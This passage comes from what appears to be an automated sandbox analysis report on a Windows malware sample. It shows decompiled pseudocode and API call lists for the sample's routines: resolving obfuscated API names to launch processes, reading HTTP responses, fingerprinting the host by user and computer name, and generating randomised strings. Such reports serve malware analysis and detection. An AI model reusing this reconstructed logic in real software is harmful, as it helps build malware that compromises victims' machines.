                • Part of subcall function 02CE597D: SysAllocString.OLEAUT32(?), ref: 02CE59B8
                • Part of subcall function 02CE61DA: RtlFreeHeap.NTDLL(00000000,00000000,02CE6383,00000000,?,00000000,00000000), ref: 02CE61E6
              • HeapFree.KERNEL32(00000000,?), ref: 02CE2EBF
              • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02CE2ECB
              • HeapFree.KERNEL32(00000000,?,?,05259600), ref: 02CE2ED8
              • HeapFree.KERNEL32(00000000,?), ref: 02CE2EE5
              • HeapFree.KERNEL32(00000000,?), ref: 02CE2EEF
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.568811195.0000000002CE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02CE0000, based on PE: true
              • Associated: 00000000.00000002.568806289.0000000002CE0000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568818365.0000000002CE9000.00000002.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568822120.0000000002CEA000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568826250.0000000002CEC000.00000002.10000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_2ce0000_server.jbxd
              Similarity
              • API ID: Heap$Free$wsprintf$lstrlen$CriticalSectionlstrcat$lstrcpy$CountEnterLeaveTickTrim$AllocAllocateStringmbstowcsmemsetstrcpywcstombs
              • String ID: Uqt
              • API String ID: 1185349883-2320327147
              • Opcode ID: 9fc4f19e77807adaecc69f7611c4a50e4c857bb5d037d3ee425f408ece55f2a0
              • Instruction ID: 7fde510df6002e7dcbe2f0febc1217378a8cd1924b24b3783faa7ad0eb670fad
              • Opcode Fuzzy Hash: 9fc4f19e77807adaecc69f7611c4a50e4c857bb5d037d3ee425f408ece55f2a0
              • Instruction Fuzzy Hash: 2BA15A71940210EFCF11EB64DC84F5A7BE9EF88754F150A28F84ADB220D731D965DBA2
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 73%
              			E02CE37DF(void* __eax, void* __ecx) {
              				long _v8;
              				char _v12;
              				void* _v16;
              				void* _v28;
              				long _v32;
              				void _v104;
              				char _v108;
              				long _t36;
              				intOrPtr _t40;
              				intOrPtr _t47;
              				intOrPtr _t50;
              				void* _t58;
              				void* _t68;
              				intOrPtr* _t70;
              				intOrPtr* _t71;
              
              				_t1 = __eax + 0x14; // 0x74183966
              				_t69 =  *_t1;
              				_t36 = E02CE6BF9(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
              				_v8 = _t36;
              				if(_t36 != 0) {
              					L12:
              					return _v8;
              				}
              				E02CE7AB0( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
              				_t40 = _v12(_v12);
              				_v8 = _t40;
              				if(_t40 == 0 && ( *0x2cea300 & 0x00000001) != 0) {
              					_v32 = 0;
              					asm("stosd");
              					asm("stosd");
              					asm("stosd");
              					_v108 = 0;
              					memset( &_v104, 0, 0x40);
              					_t47 =  *0x2cea348; // 0x256d5a8
              					_t18 = _t47 + 0x2ceb706; // 0x73797325
              					_t68 = E02CE127E(_t18);
              					if(_t68 == 0) {
              						_v8 = 8;
              					} else {
              						_t50 =  *0x2cea348; // 0x256d5a8
              						_t19 = _t50 + 0x2ceb86c; // 0x5258e14
              						_t20 = _t50 + 0x2ceb3f6; // 0x4e52454b
              						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
              						if(_t71 == 0) {
              							_v8 = 0x7f;
              						} else {
              							_v108 = 0x44;
              							E02CE5B56();
              							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
              							_push(1);
              							E02CE5B56();
              							if(_t58 == 0) {
              								_v8 = GetLastError();
              							} else {
              								CloseHandle(_v28);
              								CloseHandle(_v32);
              							}
              						}
              						HeapFree( *0x2cea2d8, 0, _t68);
              					}
              				}
              				_t70 = _v16;
              				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
              				E02CE61DA(_t70);
              				goto L12;
              			}


















              0x02ce37e7
              0x02ce37e7
              0x02ce37f6
              0x02ce37fd
              0x02ce3802
              0x02ce390f
              0x02ce3916
              0x02ce3916
              0x02ce3811
              0x02ce3819
              0x02ce381c
              0x02ce3821
              0x02ce3836
              0x02ce383c
              0x02ce383d
              0x02ce3840
              0x02ce3846
              0x02ce3849
              0x02ce384e
              0x02ce3856
              0x02ce3862
              0x02ce3866
              0x02ce38f6
              0x02ce386c
              0x02ce386c
              0x02ce3871
              0x02ce3878
              0x02ce388c
              0x02ce3890
              0x02ce38df
              0x02ce3892
              0x02ce3893
              0x02ce389a
              0x02ce38b3
              0x02ce38b5
              0x02ce38b9
              0x02ce38c0
              0x02ce38da
              0x02ce38c2
              0x02ce38cb
              0x02ce38d0
              0x02ce38d0
              0x02ce38c0
              0x02ce38ee
              0x02ce38ee
              0x02ce3866
              0x02ce38fd
              0x02ce3906
              0x02ce390a
              0x00000000

              APIs
                • Part of subcall function 02CE6BF9: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,02CE37FB,?,?,?,?,00000000,00000000), ref: 02CE6C1E
                • Part of subcall function 02CE6BF9: GetProcAddress.KERNEL32(00000000,7243775A), ref: 02CE6C40
                • Part of subcall function 02CE6BF9: GetProcAddress.KERNEL32(00000000,614D775A), ref: 02CE6C56
                • Part of subcall function 02CE6BF9: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 02CE6C6C
                • Part of subcall function 02CE6BF9: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 02CE6C82
                • Part of subcall function 02CE6BF9: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 02CE6C98
              • memset.NTDLL ref: 02CE3849
                • Part of subcall function 02CE127E: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,02CE3862,73797325), ref: 02CE128F
                • Part of subcall function 02CE127E: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 02CE12A9
              • GetModuleHandleA.KERNEL32(4E52454B,05258E14,73797325), ref: 02CE387F
              • GetProcAddress.KERNEL32(00000000), ref: 02CE3886
              • HeapFree.KERNEL32(00000000,00000000), ref: 02CE38EE
                • Part of subcall function 02CE5B56: GetProcAddress.KERNEL32(36776F57,02CE2425), ref: 02CE5B71
              • CloseHandle.KERNEL32(00000000,00000001), ref: 02CE38CB
              • CloseHandle.KERNEL32(?), ref: 02CE38D0
              • GetLastError.KERNEL32(00000001), ref: 02CE38D4
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.568811195.0000000002CE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02CE0000, based on PE: true
              • Associated: 00000000.00000002.568806289.0000000002CE0000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568818365.0000000002CE9000.00000002.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568822120.0000000002CEA000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568826250.0000000002CEC000.00000002.10000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_2ce0000_server.jbxd
              Similarity
              • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
              • String ID: Uqt$@MqtNqt
              • API String ID: 3075724336-3266969629
              • Opcode ID: b22c23e175f1ac00ae1d8636b6d844ce8fb02045aa235e1c61437fa4cd4b5a2e
              • Instruction ID: 6b2970231f83c4455bb43f9291c77834cb39edb24d355adb6556979fa5b5f935
              • Opcode Fuzzy Hash: b22c23e175f1ac00ae1d8636b6d844ce8fb02045aa235e1c61437fa4cd4b5a2e
              • Instruction Fuzzy Hash: 3E3130B2D00208EFDF20AFA5DC89EAEBBBDEF48344F114565E616A7110D731AE54DB60
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E02CE3FA5(void* __ecx, void* __esi) {
              				long _v8;
              				long _v12;
              				long _v16;
              				long _v20;
              				long _t34;
              				long _t39;
              				long _t42;
              				long _t56;
              				void* _t58;
              				void* _t59;
              				void* _t61;
              
              				_t61 = __esi;
              				_t59 = __ecx;
              				 *((intOrPtr*)(__esi + 0x2c)) = 0;
              				do {
              					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
              					_v20 = _t34;
              					if(_t34 != 0) {
              						L3:
              						_v8 = 4;
              						_v16 = 0;
              						if(HttpQueryInfoA( *(_t61 + 0x18), 0x20000013, _t61 + 0x2c,  &_v8,  &_v16) == 0) {
              							_t39 = GetLastError();
              							_v12 = _t39;
              							if(_v20 == 0 || _t39 != 0x2ef3) {
              								L15:
              								return _v12;
              							} else {
              								goto L11;
              							}
              						}
              						if(_v8 != 4 ||  *(_t61 + 0x2c) == 0) {
              							goto L11;
              						} else {
              							_v16 = 0;
              							_v8 = 0;
              							HttpQueryInfoA( *(_t61 + 0x18), 0x16, 0,  &_v8,  &_v16);
              							_t58 = E02CE33DC(_v8 + 1);
              							if(_t58 == 0) {
              								_v12 = 8;
              							} else {
              								if(HttpQueryInfoA( *(_t61 + 0x18), 0x16, _t58,  &_v8,  &_v16) == 0) {
              									E02CE61DA(_t58);
              									_v12 = GetLastError();
              								} else {
              									 *((char*)(_t58 + _v8)) = 0;
              									 *(_t61 + 0xc) = _t58;
              								}
              							}
              							goto L15;
              						}
              					}
              					SetEvent( *(_t61 + 0x1c));
              					_t56 =  *((intOrPtr*)(_t61 + 0x28));
              					_v12 = _t56;
              					if(_t56 != 0) {
              						goto L15;
              					}
              					goto L3;
              					L11:
              					_t42 = E02CE16B2( *(_t61 + 0x1c), _t59, 0xea60);
              					_v12 = _t42;
              				} while (_t42 == 0);
              				goto L15;
              			}














              0x02ce3fa5
              0x02ce3fa5
              0x02ce3fb5
              0x02ce3fb8
              0x02ce3fbc
              0x02ce3fc2
              0x02ce3fc7
              0x02ce3fe0
              0x02ce3ff4
              0x02ce3ffb
              0x02ce4002
              0x02ce4055
              0x02ce405b
              0x02ce4061
              0x02ce409c
              0x02ce40a2
              0x00000000
              0x00000000
              0x00000000
              0x02ce4061
              0x02ce4008
              0x00000000
              0x02ce400f
              0x02ce401d
              0x02ce4020
              0x02ce4023
              0x02ce402f
              0x02ce4033
              0x02ce4095
              0x02ce4035
              0x02ce4047
              0x02ce4085
              0x02ce4090
              0x02ce4049
              0x02ce404c
              0x02ce4050
              0x02ce4050
              0x02ce4047
              0x00000000
              0x02ce4033
              0x02ce4008
              0x02ce3fcc
              0x02ce3fd2
              0x02ce3fd5
              0x02ce3fda
              0x00000000
              0x00000000
              0x00000000
              0x02ce406a
              0x02ce4072
              0x02ce4077
              0x02ce407a
              0x00000000

              APIs
              • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,747581D0,00000000,00000000), ref: 02CE3FBC
              • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,02CE3F34,00000000,?), ref: 02CE3FCC
              • HttpQueryInfoA.WININET(?,20000013,?,?), ref: 02CE3FFE
              • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 02CE4023
              • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 02CE4043
              • GetLastError.KERNEL32 ref: 02CE4055
                • Part of subcall function 02CE16B2: WaitForMultipleObjects.KERNEL32(00000002,02CE7C47,00000000,02CE7C47,?,?,?,02CE7C47,0000EA60), ref: 02CE16CD
                • Part of subcall function 02CE61DA: RtlFreeHeap.NTDLL(00000000,00000000,02CE6383,00000000,?,00000000,00000000), ref: 02CE61E6
              • GetLastError.KERNEL32(00000000), ref: 02CE408A
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.568811195.0000000002CE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02CE0000, based on PE: true
              • Associated: 00000000.00000002.568806289.0000000002CE0000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568818365.0000000002CE9000.00000002.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568822120.0000000002CEA000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568826250.0000000002CEC000.00000002.10000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_2ce0000_server.jbxd
              Similarity
              • API ID: HttpInfoQuery$ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
              • String ID: @MqtNqt
              • API String ID: 3369646462-2883916605
              • Opcode ID: 233f0a31e3f312e98052e943d598c1b7e366b16432ee21effe2c9cba05f31d3c
              • Instruction ID: 1142c6a1c02e7233078eac3bdbbb101801d47af5ccb89842c552db1a6053ff3e
              • Opcode Fuzzy Hash: 233f0a31e3f312e98052e943d598c1b7e366b16432ee21effe2c9cba05f31d3c
              • Instruction Fuzzy Hash: B0310AB5D00309EFDF31DFA5C884AAEBBB8AB48304F1049B9E603A6140D771AB449F91
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 43%
              			E02CE7238(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
              				intOrPtr _v8;
              				intOrPtr _v12;
              				intOrPtr _v16;
              				char _v20;
              				intOrPtr _v24;
              				signed int _v28;
              				intOrPtr _v32;
              				void* __edi;
              				void* __esi;
              				intOrPtr _t58;
              				signed int _t60;
              				signed int _t62;
              				intOrPtr _t64;
              				intOrPtr _t66;
              				intOrPtr _t70;
              				void* _t72;
              				void* _t75;
              				void* _t76;
              				intOrPtr _t80;
              				WCHAR* _t83;
              				void* _t84;
              				void* _t85;
              				void* _t86;
              				intOrPtr _t92;
              				intOrPtr* _t102;
              				signed int _t103;
              				void* _t104;
              				intOrPtr _t105;
              				void* _t107;
              				intOrPtr* _t115;
              				void* _t119;
              				intOrPtr _t125;
              
              				_t58 =  *0x2cea3dc; // 0x5259ca0
              				_v24 = _t58;
              				_v28 = 8;
              				_v20 = GetTickCount();
              				_t60 = E02CE6ABD();
              				_t103 = 5;
              				_t98 = _t60 % _t103 + 6;
              				_t62 = E02CE6ABD();
              				_t117 = _t62 % _t103 + 6;
              				_v32 = _t62 % _t103 + 6;
              				_t64 = E02CE42E9(_t60 % _t103 + 6);
              				_v16 = _t64;
              				if(_t64 != 0) {
              					_t66 = E02CE42E9(_t117);
              					_v12 = _t66;
              					if(_t66 != 0) {
              						_push(5);
              						_t104 = 0xa;
              						_t119 = E02CE398D(_t104,  &_v20);
              						if(_t119 == 0) {
              							_t119 = 0x2ce918c;
              						}
              						_t70 = E02CE5FA1(_v24);
              						_v8 = _t70;
              						if(_t70 != 0) {
              							_t115 = __imp__;
              							_t72 =  *_t115(_t119);
              							_t75 =  *_t115(_v8);
              							_t76 =  *_t115(_a4);
              							_t80 = E02CE33DC(lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76 + lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76);
              							_v24 = _t80;
              							if(_t80 != 0) {
              								_t105 =  *0x2cea348; // 0x256d5a8
              								_t102 =  *0x2cea138; // 0x2ce7ddd
              								_t28 = _t105 + 0x2cebd10; // 0x530025
              								 *_t102(_t80, _t28, _t119, _t119, _v16, _v12, _v12, _v16, _a4, _v8, _a8);
              								_push(4);
              								_t107 = 5;
              								_t83 = E02CE398D(_t107,  &_v20);
              								_a8 = _t83;
              								if(_t83 == 0) {
              									_a8 = 0x2ce9190;
              								}
              								_t84 =  *_t115(_a8);
              								_t85 =  *_t115(_v8);
              								_t86 =  *_t115(_a4);
              								_t125 = E02CE33DC(lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + 0x13a);
              								if(_t125 == 0) {
              									E02CE61DA(_v24);
              								} else {
              									_t92 =  *0x2cea348; // 0x256d5a8
              									_t44 = _t92 + 0x2ceba20; // 0x73006d
              									 *_t102(_t125, _t44, _a8, _a8, _a4, _v8, _a12);
              									 *_a16 = _v24;
              									_v28 = _v28 & 0x00000000;
              									 *_a20 = _t125;
              								}
              							}
              							E02CE61DA(_v8);
              						}
              						E02CE61DA(_v12);
              					}
              					E02CE61DA(_v16);
              				}
              				return _v28;
              			}



































              0x02ce723e
              0x02ce7246
              0x02ce7249
              0x02ce7256
              0x02ce7259
              0x02ce7260
              0x02ce7267
              0x02ce726a
              0x02ce7277
              0x02ce727a
              0x02ce727d
              0x02ce7282
              0x02ce7287
              0x02ce728f
              0x02ce7294
              0x02ce7299
              0x02ce729f
              0x02ce72a3
              0x02ce72ac
              0x02ce72b0
              0x02ce72b2
              0x02ce72b2
              0x02ce72ba
              0x02ce72bf
              0x02ce72c4
              0x02ce72ca
              0x02ce72d1
              0x02ce72e2
              0x02ce72e9
              0x02ce72fb
              0x02ce7300
              0x02ce7305
              0x02ce730e
              0x02ce7317
              0x02ce7320
              0x02ce7336
              0x02ce733b
              0x02ce733f
              0x02ce7343
              0x02ce7348
              0x02ce734d
              0x02ce734f
              0x02ce734f
              0x02ce7359
              0x02ce7362
              0x02ce7369
              0x02ce7385
              0x02ce7389
              0x02ce73c2
              0x02ce738b
              0x02ce738e
              0x02ce7396
              0x02ce73a7
              0x02ce73af
              0x02ce73b7
              0x02ce73bb
              0x02ce73bb
              0x02ce7389
              0x02ce73ca
              0x02ce73ca
              0x02ce73d2
              0x02ce73d2
              0x02ce73da
              0x02ce73da
              0x02ce73e6

              APIs
              • GetTickCount.KERNEL32 ref: 02CE7250
              • lstrlen.KERNEL32(00000000,00000005), ref: 02CE72D1
              • lstrlen.KERNEL32(?), ref: 02CE72E2
              • lstrlen.KERNEL32(00000000), ref: 02CE72E9
              • lstrlenW.KERNEL32(80000002), ref: 02CE72F0
              • lstrlen.KERNEL32(?,00000004), ref: 02CE7359
              • lstrlen.KERNEL32(?), ref: 02CE7362
              • lstrlen.KERNEL32(?), ref: 02CE7369
              • lstrlenW.KERNEL32(?), ref: 02CE7370
                • Part of subcall function 02CE61DA: RtlFreeHeap.NTDLL(00000000,00000000,02CE6383,00000000,?,00000000,00000000), ref: 02CE61E6
              Memory Dump Source
              • Source File: 00000000.00000002.568811195.0000000002CE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02CE0000, based on PE: true
              • Associated: 00000000.00000002.568806289.0000000002CE0000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568818365.0000000002CE9000.00000002.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568822120.0000000002CEA000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568826250.0000000002CEC000.00000002.10000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_2ce0000_server.jbxd
              Similarity
              • API ID: lstrlen$CountFreeHeapTick
              • String ID:
              • API String ID: 2535036572-0
              • Opcode ID: f8c45982a82f6daf43aeb7aabf36e0b7c18e603da368b983859c048115f3fdff
              • Instruction ID: a03632405786f995e30ce196eeb55fec232ca240517b1ca935f00e9cfa6b4b95
              • Opcode Fuzzy Hash: f8c45982a82f6daf43aeb7aabf36e0b7c18e603da368b983859c048115f3fdff
              • Instruction Fuzzy Hash: C4516E72D40219EBCF12AFA5CC44AEE7BB6EF44314F154065ED09AB210DB35DA25EFA0
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E02CE1340() {
              				long _v8;
              				long _v12;
              				int _v16;
              				long _t39;
              				long _t43;
              				signed int _t47;
              				short _t51;
              				signed int _t52;
              				int _t56;
              				int _t57;
              				char* _t64;
              				short* _t67;
              
              				_v16 = 0;
              				_v8 = 0;
              				GetUserNameW(0,  &_v8);
              				_t39 = _v8;
              				if(_t39 != 0) {
              					_v12 = _t39;
              					_v8 = 0;
              					GetComputerNameW(0,  &_v8);
              					_t43 = _v8;
              					if(_t43 != 0) {
              						_t11 = _t43 + 2; // 0x775ec742
              						_v12 = _v12 + _t11;
              						_t64 = E02CE33DC(_v12 + _t11 << 2);
              						if(_t64 != 0) {
              							_t47 = _v12;
              							_t67 = _t64 + _t47 * 2;
              							_v8 = _t47;
              							if(GetUserNameW(_t67,  &_v8) == 0) {
              								L7:
              								E02CE61DA(_t64);
              							} else {
              								_t51 = 0x40;
              								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
              								_t52 = _v8;
              								_v12 = _v12 - _t52;
              								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
              									goto L7;
              								} else {
              									_t56 = _v12 + _v8;
              									_t31 = _t56 + 2; // 0x2ce3e01
              									_v12 = _t56;
              									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
              									_v8 = _t57;
              									if(_t57 == 0) {
              										goto L7;
              									} else {
              										_t64[_t57] = 0;
              										_v16 = _t64;
              									}
              								}
              							}
              						}
              					}
              				}
              				return _v16;
              			}















              0x02ce134e
              0x02ce1351
              0x02ce1354
              0x02ce135a
              0x02ce135f
              0x02ce1365
              0x02ce136d
              0x02ce1370
              0x02ce1376
              0x02ce137b
              0x02ce1384
              0x02ce1388
              0x02ce1395
              0x02ce1399
              0x02ce139b
              0x02ce139f
              0x02ce13a2
              0x02ce13b2
              0x02ce1405
              0x02ce1406
              0x02ce13b4
              0x02ce13b9
              0x02ce13ba
              0x02ce13bf
              0x02ce13c2
              0x02ce13d5
              0x00000000
              0x02ce13d7
              0x02ce13da
              0x02ce13df
              0x02ce13ed
              0x02ce13f0
              0x02ce13f6
              0x02ce13fb
              0x00000000
              0x02ce13fd
              0x02ce13fd
              0x02ce1400
              0x02ce1400
              0x02ce13fb
              0x02ce13d5
              0x02ce140b
              0x02ce140c
              0x02ce137b
              0x02ce1412

              APIs
              • GetUserNameW.ADVAPI32(00000000,02CE3DFF), ref: 02CE1354
              • GetComputerNameW.KERNEL32(00000000,02CE3DFF), ref: 02CE1370
                • Part of subcall function 02CE33DC: RtlAllocateHeap.NTDLL(00000000,00000000,02CE62F6), ref: 02CE33E8
              • GetUserNameW.ADVAPI32(00000000,02CE3DFF), ref: 02CE13AA
              • GetComputerNameW.KERNEL32(02CE3DFF,775EC740), ref: 02CE13CD
              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,02CE3DFF,00000000,02CE3E01,00000000,00000000,?,775EC740,02CE3DFF), ref: 02CE13F0
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.568811195.0000000002CE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02CE0000, based on PE: true
              • Associated: 00000000.00000002.568806289.0000000002CE0000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568818365.0000000002CE9000.00000002.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568822120.0000000002CEA000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568826250.0000000002CEC000.00000002.10000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_2ce0000_server.jbxd
              Similarity
              • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
              • String ID: @hqt
              • API String ID: 3850880919-2648236075
              • Opcode ID: c496a078f7c7cd3f03b9dab7bb8ba55d7b725ea7989bab74a100b8b05e3f57f6
              • Instruction ID: c478e71ec839fb85afaa0cef0c3dad067232a2bae3fcc71a8e2de9d3d869fbcd
              • Opcode Fuzzy Hash: c496a078f7c7cd3f03b9dab7bb8ba55d7b725ea7989bab74a100b8b05e3f57f6
              • Instruction Fuzzy Hash: FB21F8B6900108FFCF11DFE5C9849EEBBB8EF48204B5444AAE506E7240DB709B55DB50
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E02CE54D8(intOrPtr _a4) {
              				void* _t2;
              				unsigned int _t4;
              				void* _t5;
              				long _t6;
              				void* _t7;
              				void* _t15;
              
              				_t2 = CreateEventA(0, 1, 0, 0);
              				 *0x2cea30c = _t2;
              				if(_t2 == 0) {
              					return GetLastError();
              				}
              				_t4 = GetVersion();
              				if(_t4 != 5) {
              					L4:
              					if(_t15 <= 0) {
              						_t5 = 0x32;
              						return _t5;
              					}
              					L5:
              					 *0x2cea2fc = _t4;
              					_t6 = GetCurrentProcessId();
              					 *0x2cea2f8 = _t6;
              					 *0x2cea304 = _a4;
              					_t7 = OpenProcess(0x10047a, 0, _t6);
              					 *0x2cea2f4 = _t7;
              					if(_t7 == 0) {
              						 *0x2cea2f4 =  *0x2cea2f4 | 0xffffffff;
              					}
              					return 0;
              				}
              				if(_t4 >> 8 > 0) {
              					goto L5;
              				}
              				_t15 = _t4 - _t4;
              				goto L4;
              			}









              0x02ce54e0
              0x02ce54e6
              0x02ce54ed
              0x00000000
              0x02ce5547
              0x02ce54ef
              0x02ce54f7
              0x02ce5504
              0x02ce5504
              0x02ce5544
              0x00000000
              0x02ce5544
              0x02ce5506
              0x02ce5506
              0x02ce550b
              0x02ce551d
              0x02ce5522
              0x02ce5528
              0x02ce552e
              0x02ce5535
              0x02ce5537
              0x02ce5537
              0x00000000
              0x02ce553e
              0x02ce5500
              0x00000000
              0x00000000
              0x02ce5502
              0x00000000

              APIs
              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,02CE5037,?), ref: 02CE54E0
              • GetVersion.KERNEL32 ref: 02CE54EF
              • GetCurrentProcessId.KERNEL32 ref: 02CE550B
              • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 02CE5528
              • GetLastError.KERNEL32 ref: 02CE5547
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.568811195.0000000002CE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02CE0000, based on PE: true
              • Associated: 00000000.00000002.568806289.0000000002CE0000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568818365.0000000002CE9000.00000002.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568822120.0000000002CEA000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568826250.0000000002CEC000.00000002.10000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_2ce0000_server.jbxd
              Similarity
              • API ID: Process$CreateCurrentErrorEventLastOpenVersion
              • String ID: @MqtNqt
              • API String ID: 2270775618-2883916605
              • Opcode ID: 2ad397d370d967432c9da67b95d3a0be09b3de6a89fb925f507806d4fbbd0050
              • Instruction ID: bfc1e475fa1cec0ae29d2ea64e26dc807b74ce8f599c79330fa769648fc6b1f1
              • Opcode Fuzzy Hash: 2ad397d370d967432c9da67b95d3a0be09b3de6a89fb925f507806d4fbbd0050
              • Instruction Fuzzy Hash: 76F0C8B4DC1342DFDF208B20A81AB143B62A749795F900E19E51BDE1C0E77081A0CF15
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • SysAllocString.OLEAUT32(00000000), ref: 02CE3ABD
              • SysAllocString.OLEAUT32(0070006F), ref: 02CE3AD1
              • SysAllocString.OLEAUT32(00000000), ref: 02CE3AE3
              • SysFreeString.OLEAUT32(00000000), ref: 02CE3B4B
              • SysFreeString.OLEAUT32(00000000), ref: 02CE3B5A
              • SysFreeString.OLEAUT32(00000000), ref: 02CE3B65
              Memory Dump Source
              • Source File: 00000000.00000002.568811195.0000000002CE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02CE0000, based on PE: true
              • Associated: 00000000.00000002.568806289.0000000002CE0000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568818365.0000000002CE9000.00000002.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568822120.0000000002CEA000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568826250.0000000002CEC000.00000002.10000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_2ce0000_server.jbxd
              Similarity
              • API ID: String$AllocFree
              • String ID:
              • API String ID: 344208780-0
              • Opcode ID: e3545b6bc99662f57a4eb8c8afe846e6d398f5bba99c175fcd91cbfb1a035eba
              • Instruction ID: ad7d5af63d9e3240aa9ef287de2c33ecd5cc3fd6a7f256905ec2aa5c7c7ed99a
              • Opcode Fuzzy Hash: e3545b6bc99662f57a4eb8c8afe846e6d398f5bba99c175fcd91cbfb1a035eba
              • Instruction Fuzzy Hash: 90416035D00649AFDF01EFB8C844AAEB7BAEF89310F144465E912EB110DB71EA05CB91
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E02CE6BF9(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
              				intOrPtr _v8;
              				intOrPtr _t23;
              				intOrPtr _t26;
              				_Unknown_base(*)()* _t28;
              				intOrPtr _t30;
              				_Unknown_base(*)()* _t32;
              				intOrPtr _t33;
              				_Unknown_base(*)()* _t35;
              				intOrPtr _t36;
              				_Unknown_base(*)()* _t38;
              				intOrPtr _t39;
              				_Unknown_base(*)()* _t41;
              				intOrPtr _t44;
              				struct HINSTANCE__* _t48;
              				intOrPtr _t54;
              
              				_t54 = E02CE33DC(0x20);
              				if(_t54 == 0) {
              					_v8 = 8;
              				} else {
              					_t23 =  *0x2cea348; // 0x256d5a8
              					_t1 = _t23 + 0x2ceb436; // 0x4c44544e
              					_t48 = GetModuleHandleA(_t1);
